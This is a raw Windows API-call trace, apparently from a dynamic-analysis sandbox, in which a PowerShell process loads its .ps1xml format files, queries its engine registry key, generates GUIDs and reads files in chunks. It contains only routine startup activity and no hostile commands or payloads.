	[0658.249] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\dotnettypes.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x16d2e0 | out: lpFileInformation=0x16d2e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67e0582f, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67e0582f, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e29f95, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x11bce)) returned 1
	[0658.249] SetErrorMode (uMode=0x1) returned 0x1
	[0658.250] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0x16d010, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0658.250] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d3c8 | out: phkResult=0x16d3c8*=0x2fc) returned 0x0
	[0658.250] RegQueryValueExW (in: hKey=0x2fc, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x16d34c, lpData=0x0, lpcbData=0x16d348*=0x0 | out: lpType=0x16d34c*=0x1, lpData=0x0, lpcbData=0x16d348*=0x56) returned 0x0
	[0658.250] CoTaskMemAlloc (cb=0x5a) returned 0x2f7cd0
	[0658.250] RegQueryValueExW (in: hKey=0x2fc, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x16d31c, lpData=0x2f7cd0, lpcbData=0x16d318*=0x56 | out: lpType=0x16d31c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x16d318*=0x56) returned 0x0
	[0658.250] CoTaskMemFree (pv=0x2f7cd0) 
	[0658.250] RegCloseKey (hKey=0x2fc) returned 0x0
	[0658.250] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0x16d010, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0658.251] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0x16cec0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0658.252] CoCreateGuid (in: pguid=0x16d5f0 | out: pguid=0x16d5f0*(Data1=0x24582aba, Data2=0xddc6, Data3=0x49fe, Data4=([0]=0x9d, [1]=0xf2, [2]=0x7e, [3]=0x50, [4]=0xa4, [5]=0x44, [6]=0xe8, [7]=0x21))) returned 0x0
	[0658.252] CoCreateGuid (in: pguid=0x16d5f0 | out: pguid=0x16d5f0*(Data1=0x183a6e1d, Data2=0x326b, Data3=0x4069, Data4=([0]=0x9a, [1]=0xbc, [2]=0x87, [3]=0x0, [4]=0xc3, [5]=0x94, [6]=0x37, [7]=0x80))) returned 0x0
	[0658.252] CoCreateGuid (in: pguid=0x16d5f0 | out: pguid=0x16d5f0*(Data1=0xe285846, Data2=0xa59e, Data3=0x4987, Data4=([0]=0x9a, [1]=0x22, [2]=0x1b, [3]=0x51, [4]=0x95, [5]=0x86, [6]=0xa9, [7]=0xd0))) returned 0x0
	[0658.252] CoCreateGuid (in: pguid=0x16d5f0 | out: pguid=0x16d5f0*(Data1=0xa47a8276, Data2=0x4a51, Data3=0x4f23, Data4=([0]=0x82, [1]=0x9c, [2]=0xf9, [3]=0x90, [4]=0x5b, [5]=0x3e, [6]=0x61, [7]=0xf1))) returned 0x0
	[0658.253] CoCreateGuid (in: pguid=0x16d5f0 | out: pguid=0x16d5f0*(Data1=0x6f188c31, Data2=0xac5f, Data3=0x46a6, Data4=([0]=0xb6, [1]=0xdd, [2]=0x27, [3]=0x89, [4]=0x42, [5]=0x62, [6]=0x2a, [7]=0x17))) returned 0x0
	[0658.253] CoCreateGuid (in: pguid=0x16d5f0 | out: pguid=0x16d5f0*(Data1=0x5557ac4d, Data2=0x8145, Data3=0x4759, Data4=([0]=0x87, [1]=0xe, [2]=0x22, [3]=0x4c, [4]=0x69, [5]=0xd0, [6]=0xf6, [7]=0x90))) returned 0x0
	[0658.253] CoCreateGuid (in: pguid=0x16d5f0 | out: pguid=0x16d5f0*(Data1=0x890a4974, Data2=0x2693, Data3=0x48f6, Data4=([0]=0xa7, [1]=0x24, [2]=0x1d, [3]=0x80, [4]=0x47, [5]=0xfc, [6]=0xf4, [7]=0x39))) returned 0x0
	[0658.253] CoCreateGuid (in: pguid=0x16d5f0 | out: pguid=0x16d5f0*(Data1=0x6d76d6df, Data2=0xcc96, Data3=0x4f87, Data4=([0]=0x8f, [1]=0xe, [2]=0xf8, [3]=0x35, [4]=0x9c, [5]=0xdb, [6]=0x33, [7]=0x2a))) returned 0x0
	[0658.253] CoCreateGuid (in: pguid=0x16d5f0 | out: pguid=0x16d5f0*(Data1=0x3e6830d4, Data2=0xc1a, Data3=0x48d5, Data4=([0]=0xb2, [1]=0xd3, [2]=0xb9, [3]=0x55, [4]=0x4b, [5]=0xd0, [6]=0x33, [7]=0x56))) returned 0x0
	[0658.253] CoCreateGuid (in: pguid=0x16d5f0 | out: pguid=0x16d5f0*(Data1=0xa265eafd, Data2=0xcc5d, Data3=0x4115, Data4=([0]=0x96, [1]=0x3c, [2]=0x8, [3]=0xab, [4]=0x26, [5]=0x2d, [6]=0xa2, [7]=0xb4))) returned 0x0
	[0658.254] CoCreateGuid (in: pguid=0x16d5f0 | out: pguid=0x16d5f0*(Data1=0x15e0ceef, Data2=0xd521, Data3=0x4376, Data4=([0]=0x92, [1]=0x5f, [2]=0x3a, [3]=0xb4, [4]=0xb5, [5]=0xc8, [6]=0xbb, [7]=0x45))) returned 0x0
	[0658.254] CoCreateGuid (in: pguid=0x16d5f0 | out: pguid=0x16d5f0*(Data1=0x1eb49731, Data2=0x3896, Data3=0x4bba, Data4=([0]=0x91, [1]=0x17, [2]=0x6f, [3]=0xc3, [4]=0xab, [5]=0xab, [6]=0x80, [7]=0xf9))) returned 0x0
	[0658.254] CoCreateGuid (in: pguid=0x16d5f0 | out: pguid=0x16d5f0*(Data1=0x923afb32, Data2=0x381e, Data3=0x4b53, Data4=([0]=0xb1, [1]=0x49, [2]=0x6, [3]=0x3e, [4]=0xde, [5]=0x97, [6]=0x69, [7]=0xe0))) returned 0x0
	[0658.254] CoCreateGuid (in: pguid=0x16d5f0 | out: pguid=0x16d5f0*(Data1=0x74ae5ef3, Data2=0xb8bd, Data3=0x4585, Data4=([0]=0x9b, [1]=0x40, [2]=0xba, [3]=0x11, [4]=0x67, [5]=0x85, [6]=0x7d, [7]=0xc2))) returned 0x0
	[0658.254] CoCreateGuid (in: pguid=0x16d5f0 | out: pguid=0x16d5f0*(Data1=0x74b0a81f, Data2=0xf971, Data3=0x43ea, Data4=([0]=0xba, [1]=0x61, [2]=0xf1, [3]=0x4d, [4]=0xf0, [5]=0xaa, [6]=0x0, [7]=0x64))) returned 0x0
	[0658.255] CoCreateGuid (in: pguid=0x16d5f0 | out: pguid=0x16d5f0*(Data1=0x2964eac7, Data2=0xbcc6, Data3=0x45bc, Data4=([0]=0xbe, [1]=0xa4, [2]=0x1b, [3]=0x61, [4]=0xd3, [5]=0x89, [6]=0x9e, [7]=0xac))) returned 0x0
	[0658.255] CoCreateGuid (in: pguid=0x16d5f0 | out: pguid=0x16d5f0*(Data1=0xc6fe25bc, Data2=0x997d, Data3=0x443f, Data4=([0]=0xb0, [1]=0x29, [2]=0x73, [3]=0x37, [4]=0x3a, [5]=0x82, [6]=0xad, [7]=0x53))) returned 0x0
	[0658.255] CoCreateGuid (in: pguid=0x16d5f0 | out: pguid=0x16d5f0*(Data1=0x9339090a, Data2=0x8a31, Data3=0x4456, Data4=([0]=0x82, [1]=0x4e, [2]=0xda, [3]=0xb2, [4]=0x92, [5]=0x4a, [6]=0x55, [7]=0x65))) returned 0x0
	[0658.255] CoCreateGuid (in: pguid=0x16d5f0 | out: pguid=0x16d5f0*(Data1=0x4ca19110, Data2=0x8a93, Data3=0x4832, Data4=([0]=0xa5, [1]=0x28, [2]=0xbd, [3]=0x35, [4]=0x3c, [5]=0x3a, [6]=0xde, [7]=0x64))) returned 0x0
	[0658.255] CoCreateGuid (in: pguid=0x16d5f0 | out: pguid=0x16d5f0*(Data1=0xe03f0bc2, Data2=0xde28, Data3=0x497e, Data4=([0]=0x80, [1]=0xb1, [2]=0x59, [3]=0xfc, [4]=0x1d, [5]=0x48, [6]=0xa8, [7]=0x4e))) returned 0x0
	[0658.255] CoCreateGuid (in: pguid=0x16d5f0 | out: pguid=0x16d5f0*(Data1=0xd6904ecc, Data2=0xf00c, Data3=0x4d5e, Data4=([0]=0x89, [1]=0x58, [2]=0x20, [3]=0x1b, [4]=0x5a, [5]=0x5d, [6]=0xaa, [7]=0x58))) returned 0x0
	[0658.256] CoCreateGuid (in: pguid=0x16d5f0 | out: pguid=0x16d5f0*(Data1=0x42b5f15c, Data2=0xbb7b, Data3=0x43a4, Data4=([0]=0x90, [1]=0x8a, [2]=0x33, [3]=0x70, [4]=0x64, [5]=0xa7, [6]=0xf4, [7]=0x96))) returned 0x0
	[0658.256] CoCreateGuid (in: pguid=0x16d5f0 | out: pguid=0x16d5f0*(Data1=0x45ac7dc5, Data2=0xdcc3, Data3=0x4e78, Data4=([0]=0xbb, [1]=0x5d, [2]=0x34, [3]=0xcd, [4]=0xe2, [5]=0x1f, [6]=0x6e, [7]=0xe1))) returned 0x0
	[0658.256] CoCreateGuid (in: pguid=0x16d5f0 | out: pguid=0x16d5f0*(Data1=0xb7059ca4, Data2=0x113e, Data3=0x42e5, Data4=([0]=0x98, [1]=0xb, [2]=0x4e, [3]=0x85, [4]=0xe0, [5]=0x8e, [6]=0xf1, [7]=0xeb))) returned 0x0
	[0658.256] CoCreateGuid (in: pguid=0x16d5f0 | out: pguid=0x16d5f0*(Data1=0xd2689ccd, Data2=0x2de5, Data3=0x4a03, Data4=([0]=0xb8, [1]=0x84, [2]=0x21, [3]=0x3f, [4]=0xbc, [5]=0x84, [6]=0x6, [7]=0xd))) returned 0x0
	[0658.256] CoCreateGuid (in: pguid=0x16d5f0 | out: pguid=0x16d5f0*(Data1=0x51e24ed9, Data2=0x8385, Data3=0x430c, Data4=([0]=0x96, [1]=0x7b, [2]=0x61, [3]=0xde, [4]=0x14, [5]=0x82, [6]=0xdb, [7]=0x83))) returned 0x0
	[0658.256] CoCreateGuid (in: pguid=0x16d5f0 | out: pguid=0x16d5f0*(Data1=0x17a7185c, Data2=0x5b3b, Data3=0x4bae, Data4=([0]=0xb3, [1]=0x85, [2]=0xe0, [3]=0x69, [4]=0x2a, [5]=0x80, [6]=0x31, [7]=0x6a))) returned 0x0
	[0658.256] CoCreateGuid (in: pguid=0x16d5f0 | out: pguid=0x16d5f0*(Data1=0xbdb72fcb, Data2=0x1ae, Data3=0x47a0, Data4=([0]=0xa0, [1]=0x3a, [2]=0xdb, [3]=0xb3, [4]=0x17, [5]=0x19, [6]=0x81, [7]=0xca))) returned 0x0
	[0658.257] CoCreateGuid (in: pguid=0x16d5f0 | out: pguid=0x16d5f0*(Data1=0x82edb50, Data2=0x252b, Data3=0x4f3a, Data4=([0]=0x88, [1]=0x6e, [2]=0xbf, [3]=0x98, [4]=0xea, [5]=0xc0, [6]=0x1a, [7]=0x59))) returned 0x0
	[0658.257] CoCreateGuid (in: pguid=0x16d5f0 | out: pguid=0x16d5f0*(Data1=0x701da1c4, Data2=0x3b7, Data3=0x48fa, Data4=([0]=0x89, [1]=0x9b, [2]=0xfb, [3]=0xcb, [4]=0x68, [5]=0xf9, [6]=0xfd, [7]=0x73))) returned 0x0
	[0658.257] CoCreateGuid (in: pguid=0x16d5f0 | out: pguid=0x16d5f0*(Data1=0xac647d58, Data2=0xc464, Data3=0x4f83, Data4=([0]=0xad, [1]=0xb8, [2]=0x86, [3]=0xbe, [4]=0x6, [5]=0xe9, [6]=0x77, [7]=0xd9))) returned 0x0
	[0658.257] CoCreateGuid (in: pguid=0x16d5f0 | out: pguid=0x16d5f0*(Data1=0x53128880, Data2=0xce23, Data3=0x4565, Data4=([0]=0xb7, [1]=0x10, [2]=0x4f, [3]=0x98, [4]=0xef, [5]=0x72, [6]=0xfa, [7]=0x8f))) returned 0x0
	[0658.257] CoCreateGuid (in: pguid=0x16d5f0 | out: pguid=0x16d5f0*(Data1=0x2bfde4e7, Data2=0x8523, Data3=0x4aa3, Data4=([0]=0x92, [1]=0x70, [2]=0x6f, [3]=0xd7, [4]=0x5, [5]=0x68, [6]=0xcd, [7]=0x63))) returned 0x0
	[0658.257] CoCreateGuid (in: pguid=0x16d5f0 | out: pguid=0x16d5f0*(Data1=0x30654236, Data2=0x3934, Data3=0x4e2d, Data4=([0]=0xa8, [1]=0xc8, [2]=0xe0, [3]=0xd6, [4]=0x3d, [5]=0xf4, [6]=0x5f, [7]=0xaf))) returned 0x0
	[0658.257] CoCreateGuid (in: pguid=0x16d5f0 | out: pguid=0x16d5f0*(Data1=0x3e050ed9, Data2=0x683f, Data3=0x4ff6, Data4=([0]=0x8d, [1]=0x6e, [2]=0xb1, [3]=0xc, [4]=0xa8, [5]=0xab, [6]=0xc3, [7]=0x1c))) returned 0x0
	[0658.258] CoCreateGuid (in: pguid=0x16d5f0 | out: pguid=0x16d5f0*(Data1=0x24495303, Data2=0xac34, Data3=0x47df, Data4=([0]=0xad, [1]=0xd1, [2]=0x9, [3]=0x7b, [4]=0xd2, [5]=0xc9, [6]=0x90, [7]=0xc))) returned 0x0
	[0660.041] CoCreateGuid (in: pguid=0x16d5f0 | out: pguid=0x16d5f0*(Data1=0x159ead46, Data2=0x5877, Data3=0x4f74, Data4=([0]=0xbf, [1]=0x39, [2]=0x5f, [3]=0xe0, [4]=0x46, [5]=0xde, [6]=0x23, [7]=0xc1))) returned 0x0
	[0660.042] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\filesystem.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x2fc
	[0660.042] GetFileType (hFile=0x2fc) returned 0x1
	[0660.042] SetErrorMode (uMode=0x1) returned 0x1
	[0660.042] GetFileType (hFile=0x2fc) returned 0x1
	[0660.042] ReadFile (in: hFile=0x2fc, lpBuffer=0x2f198d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d338, lpOverlapped=0x0 | out: lpBuffer=0x2f198d8*, lpNumberOfBytesRead=0x16d338*=0x1000, lpOverlapped=0x0) returned 1
	[0660.043] ReadFile (in: hFile=0x2fc, lpBuffer=0x2f198d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d338, lpOverlapped=0x0 | out: lpBuffer=0x2f198d8*, lpNumberOfBytesRead=0x16d338*=0x1000, lpOverlapped=0x0) returned 1
	[0660.043] ReadFile (in: hFile=0x2fc, lpBuffer=0x2f198d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d338, lpOverlapped=0x0 | out: lpBuffer=0x2f198d8*, lpNumberOfBytesRead=0x16d338*=0x1000, lpOverlapped=0x0) returned 1
	[0660.043] ReadFile (in: hFile=0x2fc, lpBuffer=0x2f198d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d338, lpOverlapped=0x0 | out: lpBuffer=0x2f198d8*, lpNumberOfBytesRead=0x16d338*=0x1000, lpOverlapped=0x0) returned 1
	[0660.044] ReadFile (in: hFile=0x2fc, lpBuffer=0x2f198d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d338, lpOverlapped=0x0 | out: lpBuffer=0x2f198d8*, lpNumberOfBytesRead=0x16d338*=0x1000, lpOverlapped=0x0) returned 1
	[0660.044] ReadFile (in: hFile=0x2fc, lpBuffer=0x2f198d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d338, lpOverlapped=0x0 | out: lpBuffer=0x2f198d8*, lpNumberOfBytesRead=0x16d338*=0x1000, lpOverlapped=0x0) returned 1
	[0660.044] ReadFile (in: hFile=0x2fc, lpBuffer=0x2f198d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d338, lpOverlapped=0x0 | out: lpBuffer=0x2f198d8*, lpNumberOfBytesRead=0x16d338*=0x119, lpOverlapped=0x0) returned 1
	[0660.044] ReadFile (in: hFile=0x2fc, lpBuffer=0x2f198d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d338, lpOverlapped=0x0 | out: lpBuffer=0x2f198d8*, lpNumberOfBytesRead=0x16d338*=0x0, lpOverlapped=0x0) returned 1
	[0660.044] CloseHandle (hObject=0x2fc) returned 1
	[0660.044] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0x16d080, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43
	[0660.045] SetErrorMode (uMode=0x1) returned 0x1
	[0660.045] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\filesystem.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x16d2e0 | out: lpFileInformation=0x16d2e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67e2b98c, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67e2b98c, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e76251, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x6119)) returned 1
	[0660.045] SetErrorMode (uMode=0x1) returned 0x1
	[0660.045] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0x16d010, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43
	[0660.045] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d3c8 | out: phkResult=0x16d3c8*=0x2fc) returned 0x0
	[0660.045] RegQueryValueExW (in: hKey=0x2fc, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x16d34c, lpData=0x0, lpcbData=0x16d348*=0x0 | out: lpType=0x16d34c*=0x1, lpData=0x0, lpcbData=0x16d348*=0x56) returned 0x0
	[0660.045] CoTaskMemAlloc (cb=0x5a) returned 0x2f7cd0
	[0660.045] RegQueryValueExW (in: hKey=0x2fc, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x16d31c, lpData=0x2f7cd0, lpcbData=0x16d318*=0x56 | out: lpType=0x16d31c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x16d318*=0x56) returned 0x0
	[0660.045] CoTaskMemFree (pv=0x2f7cd0) 
	[0660.046] RegCloseKey (hKey=0x2fc) returned 0x0
	[0660.046] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0x16d010, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43
	[0660.046] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0x16cec0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43
	[0660.046] CoCreateGuid (in: pguid=0x16d5f0 | out: pguid=0x16d5f0*(Data1=0xe9d63feb, Data2=0xbb96, Data3=0x449c, Data4=([0]=0xad, [1]=0x78, [2]=0x3d, [3]=0xdb, [4]=0x1a, [5]=0x27, [6]=0x76, [7]=0xbf))) returned 0x0
	[0660.047] CoCreateGuid (in: pguid=0x16d5f0 | out: pguid=0x16d5f0*(Data1=0xfa2bfae7, Data2=0x1e7e, Data3=0x4956, Data4=([0]=0xa0, [1]=0x54, [2]=0x8c, [3]=0x56, [4]=0x1e, [5]=0xb6, [6]=0xc, [7]=0xcd))) returned 0x0
	[0660.047] CoCreateGuid (in: pguid=0x16d5f0 | out: pguid=0x16d5f0*(Data1=0x37bca5dd, Data2=0x791, Data3=0x476f, Data4=([0]=0xa4, [1]=0x6e, [2]=0x2b, [3]=0x14, [4]=0x50, [5]=0x48, [6]=0xfd, [7]=0x27))) returned 0x0
	[0660.047] CoCreateGuid (in: pguid=0x16d5f0 | out: pguid=0x16d5f0*(Data1=0x44dee8d9, Data2=0x3e8d, Data3=0x465a, Data4=([0]=0xac, [1]=0xed, [2]=0x71, [3]=0xdb, [4]=0xbb, [5]=0x74, [6]=0xfa, [7]=0xc2))) returned 0x0
	[0660.047] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\help.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x2fc
	[0660.047] GetFileType (hFile=0x2fc) returned 0x1
	[0660.048] SetErrorMode (uMode=0x1) returned 0x1
	[0660.048] GetFileType (hFile=0x2fc) returned 0x1
	[0660.048] ReadFile (in: hFile=0x2fc, lpBuffer=0x2f75a78, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d338, lpOverlapped=0x0 | out: lpBuffer=0x2f75a78*, lpNumberOfBytesRead=0x16d338*=0x1000, lpOverlapped=0x0) returned 1
	[0660.049] ReadFile (in: hFile=0x2fc, lpBuffer=0x2f75a78, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d338, lpOverlapped=0x0 | out: lpBuffer=0x2f75a78*, lpNumberOfBytesRead=0x16d338*=0x1000, lpOverlapped=0x0) returned 1
	[0660.049] ReadFile (in: hFile=0x2fc, lpBuffer=0x2f75a78, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d338, lpOverlapped=0x0 | out: lpBuffer=0x2f75a78*, lpNumberOfBytesRead=0x16d338*=0x1000, lpOverlapped=0x0) returned 1
	[0660.049] ReadFile (in: hFile=0x2fc, lpBuffer=0x2f75a78, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d338, lpOverlapped=0x0 | out: lpBuffer=0x2f75a78*, lpNumberOfBytesRead=0x16d338*=0x1000, lpOverlapped=0x0) returned 1
	[0660.049] ReadFile (in: hFile=0x2fc, lpBuffer=0x2f75a78, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d338, lpOverlapped=0x0 | out: lpBuffer=0x2f75a78*, lpNumberOfBytesRead=0x16d338*=0x1000, lpOverlapped=0x0) returned 1
	[0660.049] ReadFile (in: hFile=0x2fc, lpBuffer=0x2f75a78, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d338, lpOverlapped=0x0 | out: lpBuffer=0x2f75a78*, lpNumberOfBytesRead=0x16d338*=0x1000, lpOverlapped=0x0) returned 1
	[0660.050] ReadFile (in: hFile=0x2fc, lpBuffer=0x2f75a78, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d338, lpOverlapped=0x0 | out: lpBuffer=0x2f75a78*, lpNumberOfBytesRead=0x16d338*=0x1000, lpOverlapped=0x0) returned 1
	[0660.050] ReadFile (in: hFile=0x2fc, lpBuffer=0x2f75a78, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d338, lpOverlapped=0x0 | out: lpBuffer=0x2f75a78*, lpNumberOfBytesRead=0x16d338*=0x1000, lpOverlapped=0x0) returned 1
	[0660.051] ReadFile (in: hFile=0x2fc, lpBuffer=0x2f75a78, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d338, lpOverlapped=0x0 | out: lpBuffer=0x2f75a78*, lpNumberOfBytesRead=0x16d338*=0x1000, lpOverlapped=0x0) returned 1
	[0660.052] ReadFile (in: hFile=0x2fc, lpBuffer=0x2f75a78, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d338, lpOverlapped=0x0 | out: lpBuffer=0x2f75a78*, lpNumberOfBytesRead=0x16d338*=0x1000, lpOverlapped=0x0) returned 1
	[0660.052] ReadFile (in: hFile=0x2fc, lpBuffer=0x2f75a78, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d338, lpOverlapped=0x0 | out: lpBuffer=0x2f75a78*, lpNumberOfBytesRead=0x16d338*=0x1000, lpOverlapped=0x0) returned 1
	[0660.052] ReadFile (in: hFile=0x2fc, lpBuffer=0x2f75a78, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d338, lpOverlapped=0x0 | out: lpBuffer=0x2f75a78*, lpNumberOfBytesRead=0x16d338*=0x1000, lpOverlapped=0x0) returned 1
	[0660.053] ReadFile (in: hFile=0x2fc, lpBuffer=0x2f75a78, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d338, lpOverlapped=0x0 | out: lpBuffer=0x2f75a78*, lpNumberOfBytesRead=0x16d338*=0x1000, lpOverlapped=0x0) returned 1
	[0660.053] ReadFile (in: hFile=0x2fc, lpBuffer=0x2f75a78, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d338, lpOverlapped=0x0 | out: lpBuffer=0x2f75a78*, lpNumberOfBytesRead=0x16d338*=0x1000, lpOverlapped=0x0) returned 1
	[0660.053] ReadFile (in: hFile=0x2fc, lpBuffer=0x2f75a78, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d338, lpOverlapped=0x0 | out: lpBuffer=0x2f75a78*, lpNumberOfBytesRead=0x16d338*=0x1000, lpOverlapped=0x0) returned 1
	[0660.054] ReadFile (in: hFile=0x2fc, lpBuffer=0x2f75a78, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d338, lpOverlapped=0x0 | out: lpBuffer=0x2f75a78*, lpNumberOfBytesRead=0x16d338*=0x1000, lpOverlapped=0x0) returned 1
	[0660.061] ReadFile (in: hFile=0x2fc, lpBuffer=0x2f75a78, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d338, lpOverlapped=0x0 | out: lpBuffer=0x2f75a78*, lpNumberOfBytesRead=0x16d338*=0x1000, lpOverlapped=0x0) returned 1
	[0660.061] ReadFile (in: hFile=0x2fc, lpBuffer=0x2f75a78, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d338, lpOverlapped=0x0 | out: lpBuffer=0x2f75a78*, lpNumberOfBytesRead=0x16d338*=0x1000, lpOverlapped=0x0) returned 1
	[0660.061] ReadFile (in: hFile=0x2fc, lpBuffer=0x2f75a78, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d338, lpOverlapped=0x0 | out: lpBuffer=0x2f75a78*, lpNumberOfBytesRead=0x16d338*=0x1000, lpOverlapped=0x0) returned 1
	[0660.062] ReadFile (in: hFile=0x2fc, lpBuffer=0x2f75a78, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d338, lpOverlapped=0x0 | out: lpBuffer=0x2f75a78*, lpNumberOfBytesRead=0x16d338*=0x1000, lpOverlapped=0x0) returned 1
	[0660.062] ReadFile (in: hFile=0x2fc, lpBuffer=0x2f75a78, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d338, lpOverlapped=0x0 | out: lpBuffer=0x2f75a78*, lpNumberOfBytesRead=0x16d338*=0x1000, lpOverlapped=0x0) returned 1
	[0660.062] ReadFile (in: hFile=0x2fc, lpBuffer=0x2f75a78, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d338, lpOverlapped=0x0 | out: lpBuffer=0x2f75a78*, lpNumberOfBytesRead=0x16d338*=0x1000, lpOverlapped=0x0) returned 1
	[0660.063] ReadFile (in: hFile=0x2fc, lpBuffer=0x2f75a78, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d338, lpOverlapped=0x0 | out: lpBuffer=0x2f75a78*, lpNumberOfBytesRead=0x16d338*=0x1000, lpOverlapped=0x0) returned 1
